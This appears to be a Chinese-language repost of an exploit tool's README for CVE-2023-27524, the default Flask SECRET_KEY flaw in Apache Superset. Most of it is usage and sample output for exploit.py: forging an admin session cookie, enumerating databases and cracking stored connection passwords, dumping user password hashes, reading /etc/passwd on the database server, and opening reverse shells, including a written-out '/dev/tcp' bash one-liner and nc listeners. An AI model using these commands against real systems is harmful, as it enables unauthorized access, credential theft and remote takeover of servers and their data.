Apache Superset 是一种广泛使用的数据可视化和探索开源工具,已被确定存在潜在的安全漏洞,可能导致身份验证绕过和远程代码执行 (RCE)。这些漏洞可能使恶意行为者能够获得目标服务器上的管理权限,从而使他们能够收集用户凭据并可能危及数据。
所涉及的具体安全问题是一个不安全的默认配置漏洞,称为 CVE-2023-27524。
根本原因在于安装过程中设置的可预测的 Flask Secret Key,影响了大量暴露的 Apache Superset 实例。尽管已经采取了一些缓解措施,但对于那些尚未更新其配置的人来说,此漏洞仍然是一个严重的问题。
官方漏洞描述:
Apache Superset 2.0.1 及之前版本中的会话验证攻击。未根据安装说明更改默认配置的 SECRET_KEY 的安装允许攻击者验证和访问未经授权的资源。这不会影响更改 SECRET_KEY 配置默认值的 Superset 管理员。
用法
安装 PIP 包:
代码语言:javascript复制pip3 install -r requirements.txt usage: exploit.py [-h] --url URL [--id ID] [--wordlist WORDLIST] [--validate] [--enum-dbs] [--enum-users] [--cmd CMD]
[--revshell REVSHELL] [--db-host]
options:
-h, --help show this help message and exit
--url URL, -u URL Host URL
--id ID User ID to forge session cookie for. Default=1
--wordlist WORDLIST, -w WORDLIST
Specify a wordlist file (default is 10.txt)
--validate, -v Validate the presence of vulnerability by login attempt
--enum-dbs, -dbs Enumerate databases
--enum-users, -eu Enumerate databases
--cmd CMD, -c CMD Run custom OS command on the database's server.
--revshell REVSHELL Specify IP:Port for reverse shell
--db-host Run commands or open reverse shell on the database server验证漏洞并尝试使用自定义单词列表破解应用程序
代码语言:javascript复制# python3 exploit.py --url http://localhost:8088 -v -w 10k_most_common_passwords.txt
[ ] Session cookie found.
[ ] Decoded session cookie: <REDACTED>
[ ] Using '10k_most_common_passwords.txt' as a wordlist.
[ ] Superset instance is VULNERABLE to CVE-2023-27524.
[ ] Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
[ ] Forged session cookie for user 1: <REDACTED>
[ ] Superset Version: 2.0.1
[ ] Login successful. Vulnerability is validated.枚举数据库
代码语言:javascript复制# python3 exploit.py -u http://localhost:8088 --enum-dbs
[ ] Session cookie found.
[ ] Decoded session cookie:
{'csrf_token': '5d4c9ad6caf94bc1c652b0fc8e8739d19c45c05a', 'locale': 'en'}
[ ] Using default secret keys.
[ ] Superset instance is VULNERABLE to CVE-2023-27524.
[ ] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[ ] Forged session cookie for user 1:
eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsQ6Q.nKTBZiUq-Cu0iWSLQIUtB2W9HnM
[ ] Version 2.0.1 seems vulnerable.
[ ] Enumerating databases via API...
[ ] Found database: "examples" with password "superset".
[ ] Found database: "SQLite".
[ ] Enumerating database connection data and cracking password if possible...
----------------- --------------------------------------------------- -------------------------- ----------------------
| database_name | sqlalchemy_uri | password | decrypted_password |
|----------------- --------------------------------------------------- -------------------------- ----------------------|
| examples | postgresql://superset:XXXXXXXXXX@db:5432/superset | MAqp6AIikZpDM5bMH4MMgA== | superset******** |
| SQLite | sqlite pysqlite:////app/superset_home/superset.db | | |
----------------- --------------------------------------------------- -------------------------- ----------------------
[ ] Process of enumerating databases finished.枚举 Superset 用户
代码语言:javascript复制# python3 exploit.py -u http://localhost:8088 --enum-users
[ ] Session cookie found.
[ ] Decoded session cookie:
{'csrf_token': '2a3adb09bac36c330a77c74da1cca27c431779e8', 'locale': 'en'}
[ ] Using default secret keys.
[ ] Superset instance is VULNERABLE to CVE-2023-27524.
[ ] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[ ] Forged session cookie for user 1:
eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRCQ.qeci7JgO5Lb4AwexB0Qojp5RDbs
[ ] Version 2.0.1 seems vulnerable.
[ ] Checking existing metadata database connection...
[ ] Settings of database with id 1 were successfully modified.
[ ] Settings of database with id 2 were successfully modified.
[ ] Superset metadata connection is already added with id 2.
[ ] Trying to enumerate Superset users...
[ ] RESULT:
------------ --------------------------------------------------------------------------------------------------------
| username | password |
|------------ --------------------------------------------------------------------------------------------------------|
| admin | pbkdf2:sha256:260000$z5y5YnluWzyx4kd2$33c40dfefdea9aedef6ed171a941492516ba49c1ed8ed740d7e05446ce639c0e |
------------ -------------------------------------------------------------------------------------------------------- 运行自定义操作系统命令
在 Superset 服务器上:
代码语言:javascript复制# python3 exploit.py --url http://localhost:8088 --cmd 'bash -i >& /dev/tcp/<IP>/4242 0>&1'请注意,在这种情况下还无法查看输出。
在数据库服务器上:
代码语言:javascript复制# python3 exploit.py -u http://localhost:8088 --cmd 'cat /etc/passwd' --db-host
[ ] Session cookie found.
[ ] Decoded session cookie:
{'csrf_token': 'c2154d7077f507bd69c791f9d6de49115ba290a3', 'locale': 'en'}
[ ] Using default secret keys.
[ ] Superset instance is VULNERABLE to CVE-2023-27524.
[ ] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[ ] Forged session cookie for user 1:
eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRMw.haTjE2XBuVjamMvsdg7SemBr3Ig
[ ] Version 2.0.1 seems vulnerable.
[ ] Trying to run command on the database server...
[ ] Settings of database with id 1 were successfully modified.
[ ] $ cat /etc/passwd
-----------------------------------------------------------------------------------
| cmd_output |
|-----------------------------------------------------------------------------------|
| root:x:0:0:root:/root:/bin/bash |
| daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin |
| <REDACTED> |
| postgres:x:999:999::/var/lib/postgresql:/bin/bash |
----------------------------------------------------------------------------------- 打开反向shell
在 Superset 服务器上:
代码语言:javascript复制# Terminal 1
nc -lvnp [PORT]
# Terminal 2
python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT]在数据库服务器上:
代码语言:javascript复制# Terminal 1
nc -lvnp [PORT]
# Terminal 2
python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT] --db-host
